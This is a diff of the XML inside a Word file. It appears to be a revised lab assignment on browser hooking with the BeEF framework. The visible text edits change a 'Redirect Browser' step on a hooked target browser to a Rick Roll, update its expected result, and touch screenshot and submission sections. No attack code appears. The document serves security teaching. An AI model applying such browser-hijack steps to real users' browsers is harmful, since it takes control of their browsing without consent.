         <w:sym w:font="Wingdings" w:char="F0E0"/>
@@ -1335,9 +1500,7 @@
           <w:numId w:val="45"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc96778911"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:r>
         <w:t>There will be a</w:t>
       </w:r>
       <w:r>
@@ -1563,26 +1726,21 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Hooked Domain</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:sym w:font="Wingdings" w:char="F0E0"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>Redirect Browser</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Redirect Browser</w:t>
-      </w:r>
-      <w:r>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(Rick Roll)</w:t>
       </w:r>
       <w:r>
         <w:sym w:font="Wingdings" w:char="F0E0"/>
@@ -1610,10 +1768,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>The Target browser will go to beefproject.com, or wh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>atever website you typed in.</w:t>
+        <w:t>The Target browser wi</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ll show video unavailable. Click Watch on YouTube</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1846,7 +2007,19 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:sym w:font="Wingdings" w:char="F0E0"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2007,6 +2180,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Insert a screenshot:</w:t>
       </w:r>
     </w:p>
@@ -2045,10 +2219,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc191729609"/>
       <w:r>
         <w:t>Assignment Submission</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:r>
@@ -2068,12 +2243,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="even" r:id="rId9"/>
-      <w:headerReference w:type="default" r:id="rId10"/>
-      <w:footerReference w:type="even" r:id="rId11"/>
-      <w:footerReference w:type="default" r:id="rId12"/>
-      <w:headerReference w:type="first" r:id="rId13"/>
-      <w:footerReference w:type="first" r:id="rId14"/>
+      <w:footerReference w:type="default" r:id="rId9"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -2084,7 +2254,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2109,17 +2279,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Footer"/>
-    </w:pPr>
-  </w:p>
-</w:ftr>
-</file>
-
-<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -2162,39 +2322,26 @@
       <w:t xml:space="preserve">Revised: </w:t>
     </w:r>
     <w:r>
-      <w:fldChar w:fldCharType="begin"/>
+      <w:t>0</w:t>
     </w:r>
     <w:r>
-      <w:instrText xml:space="preserve"> SAVEDATE \@ "M/d/yyyy" \* MERGEFORMAT </w:instrText>
+      <w:t>3</w:t>
     </w:r>
     <w:r>
-      <w:fldChar w:fldCharType="separate"/>
+      <w:t>/</w:t>
     </w:r>
     <w:r>
-      <w:rPr>
-        <w:noProof/>
-      </w:rPr>
-      <w:t>2/28/2022</w:t>
+      <w:t>01</w:t>
     </w:r>
     <w:r>
-      <w:fldChar w:fldCharType="end"/>
+      <w:t>/24</w:t>
     </w:r>
   </w:p>
 </w:ftr>
 </file>
 
-<file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Footer"/>
-    </w:pPr>
-  </w:p>
-</w:ftr>
-</file>
-
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -2218,38 +2365,8 @@
 </w:footnotes>
 </file>
 
-<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Header"/>
-    </w:pPr>
-  </w:p>
-</w:hdr>
-</file>
-
-<file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" 